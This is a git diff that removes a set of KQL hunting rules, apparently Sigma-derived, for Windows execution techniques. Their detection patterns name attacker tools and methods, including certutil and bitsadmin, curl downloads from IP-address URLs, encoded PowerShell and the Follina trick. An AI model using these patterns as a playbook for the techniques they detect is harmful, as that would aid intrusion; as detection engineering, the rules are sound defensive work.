b/Execution/Cmd.EXE_Missing_Space_Characters_Execution_Anomaly.kql deleted file mode 100644 index b601c089..00000000 --- a/Execution/Cmd.EXE_Missing_Space_Characters_Execution_Anomaly.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/08/23 -// Level: high -// Description: Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. -This could be a sign of obfuscation of a fat finger problem (typo by the developer). - -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "cmd.exe/c" or ProcessCommandLine contains "\\cmd/c" or ProcessCommandLine contains "\"cmd/c" or ProcessCommandLine contains "cmd.exe/k" or ProcessCommandLine contains "\\cmd/k" or ProcessCommandLine contains "\"cmd/k" or ProcessCommandLine contains "cmd.exe/r" or ProcessCommandLine contains "\\cmd/r" or ProcessCommandLine contains "\"cmd/r") or (ProcessCommandLine contains "/cwhoami" or ProcessCommandLine contains "/cpowershell" or ProcessCommandLine contains "/cschtasks" or ProcessCommandLine contains "/cbitsadmin" or ProcessCommandLine contains "/ccertutil" or ProcessCommandLine contains "/kwhoami" or ProcessCommandLine contains "/kpowershell" or ProcessCommandLine contains "/kschtasks" or ProcessCommandLine contains "/kbitsadmin" or ProcessCommandLine contains "/kcertutil") or (ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /r")) and (not(((ProcessCommandLine in~ ("cmd.exe /c") or ProcessCommandLine contains "AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\node_modules" or ProcessCommandLine endswith "cmd.exe/c .") or (ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /r ")))) \ No newline at end of file diff --git a/Execution/Command_Line_Execution_with_Suspicious_URL_and_AppData_Strings.kql b/Execution/Command_Line_Execution_with_Suspicious_URL_and_AppData_Strings.kql deleted file mode 100644 index fb202cf7..00000000 --- a/Execution/Command_Line_Execution_with_Suspicious_URL_and_AppData_Strings.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community -// Date: 2019/01/16 -// Level: medium -// Description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell) -// Tags: attack.execution, attack.command_and_control, attack.t1059.003, attack.t1059.001, attack.t1105 -DeviceProcessEvents -| where (ProcessCommandLine contains "http" and ProcessCommandLine contains "://" and ProcessCommandLine contains "%AppData%") and FolderPath endswith "\\cmd.exe" \ No newline at end of file diff --git a/Execution/Computer_Password_Change_Via_Ksetup.EXE.kql b/Execution/Computer_Password_Change_Via_Ksetup.EXE.kql deleted file mode 100644 index 5ca60a02..00000000 --- a/Execution/Computer_Password_Change_Via_Ksetup.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/04/06 -// Level: medium -// Description: Detects password change for the computer's domain account or host principal via "ksetup.exe" -// Tags: attack.execution -DeviceProcessEvents -| where ProcessCommandLine contains " /setcomputerpassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe") \ No newline at end of file diff --git a/Execution/Computer_System_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Computer_System_Reconnaissance_Via_Wmic.EXE.kql deleted file mode 100644 index 3aa4acf8..00000000 --- a/Execution/Computer_System_Reconnaissance_Via_Wmic.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/08 -// Level: medium -// Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc. -// Tags: attack.discovery, attack.execution, attack.t1047 -DeviceProcessEvents -| where ProcessCommandLine contains "computersystem" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/Execution/Conhost.exe_CommandLine_Path_Traversal.kql b/Execution/Conhost.exe_CommandLine_Path_Traversal.kql deleted file mode 100644 index f38d94ed..00000000 --- a/Execution/Conhost.exe_CommandLine_Path_Traversal.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/14 -// Level: high -// Description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking -// Tags: attack.execution, attack.t1059.003 -DeviceProcessEvents -| where ProcessCommandLine contains "/../../" and InitiatingProcessCommandLine contains "conhost" \ No newline at end of file diff --git a/Execution/Conhost_Spawned_By_Uncommon_Parent_Process.kql b/Execution/Conhost_Spawned_By_Uncommon_Parent_Process.kql deleted file mode 100644 index bf76ea86..00000000 --- a/Execution/Conhost_Spawned_By_Uncommon_Parent_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Rauch, Elastic (idea) -// Date: 2022/09/28 -// Level: medium -// Description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity. -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (FolderPath endswith "\\conhost.exe" and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\userinit.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe")) and (not((InitiatingProcessCommandLine contains "-k apphost -s AppHostSvc" or InitiatingProcessCommandLine contains "-k imgsvc" or InitiatingProcessCommandLine contains "-k localService -p -s RemoteRegistry" or InitiatingProcessCommandLine contains "-k LocalSystemNetworkRestricted -p -s NgcSvc" or InitiatingProcessCommandLine contains "-k NetSvcs -p -s NcaSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s NetSetupSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s wlidsvc" or InitiatingProcessCommandLine contains "-k NetworkService -p -s DoSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s AppXSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s ClipSVC"))) and (not((InitiatingProcessCommandLine contains "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessCommandLine contains "C:\\Program Files\\Dropbox\\Client\\"))) \ No newline at end of file diff --git a/Execution/Control_Panel_Items.kql b/Execution/Control_Panel_Items.kql deleted file mode 100644 index de98b896..00000000 --- a/Execution/Control_Panel_Items.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_) -// Date: 2020/06/22 -// Level: high -// Description: Detects the malicious use of a control panel item -// Tags: attack.execution, attack.defense_evasion, attack.t1218.002, attack.persistence, attack.t1546 -DeviceProcessEvents -| where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|"))))) \ No newline at end of file diff --git a/Execution/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql b/Execution/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql deleted file mode 100644 index 1f4c9f72..00000000 --- a/Execution/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton -// Date: 2020/10/11 -// Level: medium -// Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "ConvertTo-SecureString" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Execution/Created_Files_by_Microsoft_Sync_Center.kql b/Execution/Created_Files_by_Microsoft_Sync_Center.kql deleted file mode 100644 index ef6299fb..00000000 --- a/Execution/Created_Files_by_Microsoft_Sync_Center.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: elhoim -// Date: 2022/04/28 -// Level: medium -// Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync) -// Tags: attack.t1055, attack.t1218, attack.execution, attack.defense_evasion -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") \ No newline at end of file diff --git a/Execution/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql b/Execution/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql deleted file mode 100644 index 544ae6eb..00000000 --- a/Execution/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2019/02/11 -// Level: high -// Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery. -// Tags: attack.execution, attack.t1059.005, attack.t1059.007, attack.defense_evasion, attack.t1218.005, attack.t1027.004 -DeviceProcessEvents -| where (FolderPath endswith "\\csc.exe" or ProcessVersionInfoOriginalFileName =~ "csc.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "-Encoded " or InitiatingProcessCommandLine contains "FromBase64String") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) or (InitiatingProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$" or (InitiatingProcessCommandLine contains ":\\PerfLogs\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Pictures\\"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or InitiatingProcessFolderPath =~ "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection"))) \ No newline at end of file diff --git a/Execution/Curl_Web_Request_With_Potential_Custom_User-Agent.kql b/Execution/Curl_Web_Request_With_Potential_Custom_User-Agent.kql deleted file mode 100644 index 62a6d145..00000000 --- a/Execution/Curl_Web_Request_With_Potential_Custom_User-Agent.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/07/27 -// Level: medium -// Description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains "User-Agent:" and ProcessCommandLine matches regex "\\s-H\\s") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") \ No newline at end of file diff --git a/Execution/DLL_Load_via_LSASS.kql b/Execution/DLL_Load_via_LSASS.kql deleted file mode 100644 index 0cc97026..00000000 --- a/Execution/DLL_Load_via_LSASS.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/10/16 -// Level: high -// Description: Detects a method to load DLL via LSASS process using an undocumented Registry key -// Tags: attack.execution, attack.persistence, attack.t1547.008 -DeviceRegistryEvents -| where (RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt" or RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt") and (not(((RegistryValueData in~ ("%%systemroot%%\\system32\\ntdsa.dll", "%%systemroot%%\\system32\\lsadb.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe"))) \ No newline at end of file diff --git a/Execution/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql b/Execution/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql deleted file mode 100644 index 42c5fde8..00000000 --- a/Execution/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Agro (@agro_sev) oscd.community -// Date: 2020/10/10 -// Level: medium -// Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. -Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. - -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\sqlps.exe" or ((FolderPath endswith "\\sqlps.exe" or ProcessVersionInfoOriginalFileName =~ "sqlps.exe") and (not(InitiatingProcessFolderPath endswith "\\sqlagent.exe"))) \ No newline at end of file diff --git a/Execution/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql b/Execution/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql deleted file mode 100644 index 4a2e8091..00000000 --- a/Execution/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: bartblaze -// Date: 2020/07/13 -// Level: medium -// Description: Detects dllhost initiating a network connection to a non-local IP address. -Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. -An initial baseline is recommended before deployment. - -// Tags: attack.defense_evasion, attack.t1218, attack.execution, attack.t1559.001 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\dllhost.exe" and (not(((ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "fc00::/7") or ipv4_is_in_range(RemoteIP, "fe80::/10")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24"))))) \ No newline at end of file diff --git a/Execution/DotNET_Assembly_DLL_Loaded_Via_Office_Application.kql b/Execution/DotNET_Assembly_DLL_Loaded_Via_Office_Application.kql deleted file mode 100644 index 5eda2d31..00000000 --- a/Execution/DotNET_Assembly_DLL_Loaded_Via_Office_Application.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Antonlovesdnb -// Date: 2020/02/19 -// Level: medium -// Description: Detects any assembly DLL being loaded by an Office Product -// Tags: attack.execution, attack.t1204.002 -DeviceImageLoadEvents -| where FolderPath startswith "C:\\Windows\\assembly\\" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/Execution/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql b/Execution/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql deleted file mode 100644 index 5f8aed77..00000000 --- a/Execution/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: omkar72, oscd.community -// Date: 2020/10/14 -// Level: high -// Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution. -// Tags: attack.execution, attack.privilege_escalation, attack.t1055 -DeviceImageLoadEvents -| where (FolderPath endswith "\\clr.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\mscorlib.dll") and (InitiatingProcessFolderPath endswith "\\cmstp.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\msxsl.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") \ No newline at end of file diff --git a/Execution/Enable_Microsoft_Dynamic_Data_Exchange.kql b/Execution/Enable_Microsoft_Dynamic_Data_Exchange.kql deleted file mode 100644 index 5c3a7ad7..00000000 --- a/Execution/Enable_Microsoft_Dynamic_Data_Exchange.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/02/26 -// Level: medium -// Description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel. -// Tags: attack.execution, attack.t1559.002 -DeviceRegistryEvents -| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLaunch" or RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLookup")) or ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Word\\Security\\AllowDDE") \ No newline at end of file diff --git a/Execution/Exchange_PowerShell_Snap-Ins_Usage.kql b/Execution/Exchange_PowerShell_Snap-Ins_Usage.kql deleted file mode 100644 index 32eb0763..00000000 --- a/Execution/Exchange_PowerShell_Snap-Ins_Usage.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/03/03 -// Level: high -// Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27 -// Tags: attack.execution, attack.t1059.001, attack.collection, attack.t1114 -DeviceProcessEvents -| where (ProcessCommandLine contains "Add-PSSnapin" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "Microsoft.Exchange.Powershell.Snapin" or ProcessCommandLine contains "Microsoft.Exchange.Management.PowerShell.SnapIn")) and (not((ProcessCommandLine contains "$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe"))) \ No newline at end of file diff --git a/Execution/Execute_Code_with_Pester.bat.kql b/Execution/Execute_Code_with_Pester.bat.kql deleted file mode 100644 index 0676e78a..00000000 --- a/Execution/Execute_Code_with_Pester.bat.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Julia Fomina, oscd.community -// Date: 2020/10/08 -// Level: medium -// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1216 -DeviceProcessEvents -| where ((ProcessCommandLine contains "Pester" and ProcessCommandLine contains "Get-Help") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "pester" and ProcessCommandLine contains ";") and FolderPath endswith "\\cmd.exe") and (ProcessCommandLine contains "help" or ProcessCommandLine contains "?")) \ No newline at end of file diff --git a/Execution/Execute_Code_with_Pester.bat_as_Parent.kql b/Execution/Execute_Code_with_Pester.bat_as_Parent.kql deleted file mode 100644 index 7a116895..00000000 --- a/Execution/Execute_Code_with_Pester.bat_as_Parent.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali -// Date: 2022/08/20 -// Level: medium -// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1216 -DeviceProcessEvents -| where (InitiatingProcessCommandLine contains "{ Invoke-Pester -EnableExit ;" or InitiatingProcessCommandLine contains "{ Get-Help \"") and (InitiatingProcessCommandLine contains "\\WindowsPowerShell\\Modules\\Pester\\" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/Execution/Execute_MSDT_Via_Answer_File.kql b/Execution/Execute_MSDT_Via_Answer_File.kql deleted file mode 100644 index 3ce729d9..00000000 --- a/Execution/Execute_MSDT_Via_Answer_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/13 -// Level: high -// Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab) -// Tags: attack.defense_evasion, attack.t1218, attack.execution -DeviceProcessEvents -| where ((ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af ") and (ProcessCommandLine contains "\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml" and FolderPath endswith "\\msdt.exe")) and (not(InitiatingProcessFolderPath endswith "\\pcwrun.exe")) \ No newline at end of file diff --git a/Execution/Execute_Pcwrun.EXE_To_Leverage_Follina.kql b/Execution/Execute_Pcwrun.EXE_To_Leverage_Follina.kql deleted file mode 100644 index b385a85e..00000000 --- a/Execution/Execute_Pcwrun.EXE_To_Leverage_Follina.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/13 -// Level: high -// Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability -// Tags: attack.defense_evasion, attack.t1218, attack.execution -DeviceProcessEvents -| where ProcessCommandLine contains "../" and FolderPath endswith "\\pcwrun.exe" \ No newline at end of file diff --git a/Execution/Execution_of_Powershell_Script_in_Public_Folder.kql b/Execution/Execution_of_Powershell_Script_in_Public_Folder.kql deleted file mode 100644 index b8a0887b..00000000 --- a/Execution/Execution_of_Powershell_Script_in_Public_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Max Altgelt (Nextron Systems) -// Date: 2022/04/06 -// Level: high -// Description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "-f C:\\Users\\Public" or ProcessCommandLine contains "-f \"C:\\Users\\Public" or ProcessCommandLine contains "-f %Public%" or ProcessCommandLine contains "-fi C:\\Users\\Public" or ProcessCommandLine contains "-fi \"C:\\Users\\Public" or ProcessCommandLine contains "-fi %Public%" or ProcessCommandLine contains "-fil C:\\Users\\Public" or ProcessCommandLine contains "-fil \"C:\\Users\\Public" or ProcessCommandLine contains "-fil %Public%" or ProcessCommandLine contains "-file C:\\Users\\Public" or ProcessCommandLine contains "-file \"C:\\Users\\Public" or ProcessCommandLine contains "-file %Public%") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/Execution/File_Decryption_Using_Gpg4win.kql b/Execution/File_Decryption_Using_Gpg4win.kql deleted file mode 100644 index f709dd6a..00000000 --- a/Execution/File_Decryption_Using_Gpg4win.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/09 -// Level: medium -// Description: Detects usage of Gpg4win to decrypt files -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains " -d " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") \ No newline at end of file diff --git a/Execution/File_Download_From_IP_Based_URL_Via_CertOC.EXE.kql b/Execution/File_Download_From_IP_Based_URL_Via_CertOC.EXE.kql deleted file mode 100644 index 21f09ae9..00000000 --- a/Execution/File_Download_From_IP_Based_URL_Via_CertOC.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/10/18 -// Level: high -// Description: Detects when a user downloads a file from an IP based URL using CertOC.exe -// Tags: attack.command_and_control, attack.execution, attack.t1105 -DeviceProcessEvents -| where ProcessCommandLine contains "-GetCACAPS" and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" \ No newline at end of file diff --git a/Execution/File_Download_From_IP_URL_Via_Curl.EXE.kql b/Execution/File_Download_From_IP_URL_Via_Curl.EXE.kql deleted file mode 100644 index 83ae871e..00000000 --- a/Execution/File_Download_From_IP_URL_Via_Curl.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/10/18 -// Level: medium -// Description: Detects file downloads directly from IP address URL using curl.exe -// Tags: attack.execution -DeviceProcessEvents -| where ((ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}") and (not((ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or 